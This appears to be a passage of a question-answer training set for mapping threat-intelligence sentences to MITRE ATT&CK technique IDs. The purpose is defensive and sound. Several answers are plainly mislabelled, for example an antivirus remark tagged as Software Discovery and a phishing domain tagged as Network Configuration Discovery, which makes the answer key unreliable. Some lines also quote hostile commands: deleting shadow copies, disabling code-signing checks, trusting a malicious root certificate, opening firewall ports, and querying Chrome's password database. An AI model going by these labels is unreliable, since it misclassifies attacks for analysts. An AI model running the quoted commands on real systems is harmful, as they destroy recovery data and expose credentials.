ID from MITRE ATT&CK framework.,Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEL Deletes a specified file### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can execute an LDAP query to discover e-mail accounts for domain users.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can run upload to decrypt and upload files from storage.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to set SELinux to permissive mode.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has been seen injecting a DLL into winword.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL is installed via execution of rundll32 with an export named ""init"" or ""InitW.""### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon can use HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to discover containers and other resources that are available within a containers environment.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Third-party entities can include technology companies that specialize in malware development, criminal marketplaces , or from individuals.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used Base64 encoded compressed payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has modified registry keys using the reg windows utility for its custom backdoor implants.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE can send process listings over the C2 channel.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used several tools for retrieving login and password information, including LaZagne.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke uses Windows services typically named ""javamtsup"" for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,mshta.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy creates an entry in a Registry Run key for the malware to execute on startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has exfiltrated stolen data to OneDrive accounts.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traditional antivirus software and other systems that rely on low-level indicators do not effectively detect and block common and pervasive malware### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito can launch PowerShell Scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,No pdb/debug strings are present in the code### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PipeMon installer has modified the Registry key HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors to install PipeMon as a Print Processor.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service to access any resource the user has privileges to access.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Server Command and control server that communicates via DNS tunneling Panel Graphical User Interface that allows actors to issue commands, upload and download files to Agents via the Server Table 2### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can download files to specified targets.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy has a download and upload functionality.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper may download additional files to execute.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has executed commands via scheduled tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has the ability to modify the Registry on compromised hosts using RegDeleteValueA and RegCreateKeyExA.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN collects the OS name, machine name, and architecture information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This third-party server is commonly termed a reflector.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto's installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used port 6789 to accept connections on the group's SSH server.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can use VBScript to execute malicious code.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader can establish persistence via the Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger can obtain information about the victim computer name, physical memory, country, and date.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, the service automatically starts when a system powers on.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key has the ability to gather the hostname of the victim machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 developed SUNSPOT, SUNBURST, TEARDROP, and Raindrop; SUNSPOT and SUNBURST were tailored to be incorporated into SolarWind's Orion software library.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can read specific registry values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can upload data to dedicated per-victim folders in Dropbox.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dust Storm has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can monitor processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to download files from the infected host to the command and control server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This prevented the User Access Control window from appearing.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms vice using mechanisms that are baked into a protocol.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout has the ability to proxy execution of malicious files with Rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a module to steal credentials from Web browsers on the victim machine.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon, its installer, and tools are signed with stolen code-signing certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used the Softerra LDAP browser to browse documentation on service accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon terminates anti-malware processes if they’re found running on the system.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon has been seen overwriting features of disk structure such as the MBR.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Win32 API### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use net config workstation, arp -a, and ipconfig /all to gather network configuration information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has exfiltrated data over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer attempts to remove the backup shadow files from the host using vssadmin.exe Delete Shadows /All /Quiet.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader was distributed through a compromised update to a Tor client with a coin miner payload.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has used malicious links to gain execution on victim machines.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse msiexec.exe to launch local or network accessible MSI files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type may create the file %HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk, which points to the malicious msdtc.exe file already created in the %CommonFiles% directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind obtains the victim's current time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos.Figure 3: Document metadataAdditionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of Remcos distribution campaigns that were being observed throughout 2018### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has obtained and used Empire to deploy agents.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic heavily obfuscates its code to make analysis more difficult.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised systems may leverage popular websites and social media to host command and control instructions.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used Comodo code-signing certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has delivered macro-enabled documents that required targets to click the ""enable content"" button to execute the payload on the system.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can execute payloads via shell scripting.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can execute various types of scripts on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The primary delivered mechaism for Agent Tesla is through email phishing messages.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model objects.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL is capable of starting a process using CreateProcess.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has used HTTP GET and POST requests for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a command called RunAs, which creates a new process as another user or process context.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.### Assistant: T1202: Indirect Command Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can deobfuscate and write malicious ISO files to disk.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON is written in and executed as JavaScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can open the Windows Firewall on the victim’s machine to allow incoming connections.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TURNEDUP is capable of injecting code into the APC queue of a created Rundll32 process as part of an ""Early Bird injection.""### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools can also be staged on web services, such as an adversary controlled GitHub repo.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used fake job advertisements sent via LinkedIn to spearphish victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest obtains a list of running processes using the function kill_unwanted.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.. APT18 can collect system information from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer logs its actions into files that are encrypted with 3DES.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used the WindowStyle parameter to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The data may also be sent to an alternate network location from the main command and control server.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has downloaded additional modules and malware to victim’s machines.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can obtain the computer name, OS version, and default language identifier.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has the ability to persist using scheduled tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer communicates with its C2 servers over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,creates a Registry subkey that registers a new system device.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It communicates with ftp.bytehost31[.]org via FTP for command and control (C2)### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seth-Locker has the ability to download and execute files on a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,From the fake website, information is gathered in web forms and sent to the attacker.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell script is responsible for downloading the final payload from C2 server to execute it### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command az ad user list will list all users within a domain.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,13 Copy file to adbFle.tmp, and upload it to the C2### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot collects email addresses from Outlook.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet infected WinCC machines via a hardcoded database server password.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has used the dogechain.info API to generate a C2 address.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can query the Registry to retrieve data.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has used ICMP in C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,chinapolicyanalysis.org 185.130.212.168 Domain used for spear phish sender e-mail address and to host malicious documents### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,API function names are also reversed, presumably to avoid detection in memory.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,### Common Third-party Applications Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D scrambles and encrypts data using AES256 before sending it to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 obtained the private encryption key from an Active Directory Federation Services container to decrypt corresponding SAML signing certificates.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modules can be pushed to and executed by Duqu that copy data to a staging area, compress it, and XOR encrypt it.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to create the Registry key name EstsoftAutoUpdate at HKLU\Software\Microsoft/Windows\CurrentVersion\RunOnce to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) Both the redirect code on the compromised site and the exploit code appear and disappear, indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has the capability to log keystrokes from the victim’s machine, both offline and online.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET will upload a private key file to the server to remotely access the host without a password.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT runs netstat -anp to search for rival malware connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can create a remote shell and run a given command.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links , hot data links , and requests for command execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HARDRAIN uses the command cmd.exe /c netsh firewall add portopening TCP 443 ""adp"" and makes the victim machine function as a proxy server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File systems provide a structure to store and access data from physical storage.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has been known to establish persistence by adding programs to the Run Registry key.### 